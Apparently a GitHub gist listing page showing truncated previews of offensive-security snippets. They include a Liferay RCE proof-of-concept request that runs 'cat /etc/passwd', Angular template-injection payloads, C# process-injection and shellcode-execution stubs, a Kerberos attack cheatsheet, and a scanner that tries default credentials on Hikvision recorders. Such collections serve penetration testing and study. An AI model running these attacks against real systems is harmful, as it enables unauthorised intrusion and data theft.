
ashr ashr

ashr /
Created August 12, 2021 16:08 — forked from micahvandeusen/ modified to use EfsRpcDecryptFileSrv not EfsRpcOpenFileRaw
#!/usr/bin/env python
# Author: GILLES Lionel aka topotam (@topotam77)
# Modified by: Micah Van Deusen (@micahvandeusen)
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from from @3xocyte ;)
import sys
import argparse
ashr / LiferayRCE(CVE-2020-7961).md
Created February 5, 2021 06:15 — forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

ashr / Program.cs
Created January 25, 2021 14:33
Generate a CSV containing ParentObject and SPN name from BloodHound export of GetAllSPNS Query
using System;
using System.IO;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
namespace spns
class Program
View CreateRemoteThreadDInvoke.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace InjectionTest
public class DELEGATES
ashr /
Created May 11, 2020 09:08 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

ashr / EtwpTest.cs
Created May 8, 2020 08:40 — forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
class Program
static void Main(string[] args)
ashr /
Created April 29, 2020 10:54
GhostLoader - AppDomainManager - Injection - Ghost in the Shell

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
ashr /
Created April 20, 2020 12:42 — forked from mccabe615/
Angular Template Injection Payloads

1.3.2 and below


'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
ashr /
Created February 12, 2020 04:17 — forked from smidgedy/
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
# Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001
# I do it like this:
# sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\
# -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json>
# Output filenames
ashr / AllIdoIsWin.cs
Created January 15, 2020 09:24
Stolen from twitter, think it was posted by Casey Smith (@subTee)
<Project xmlns="">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
<UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />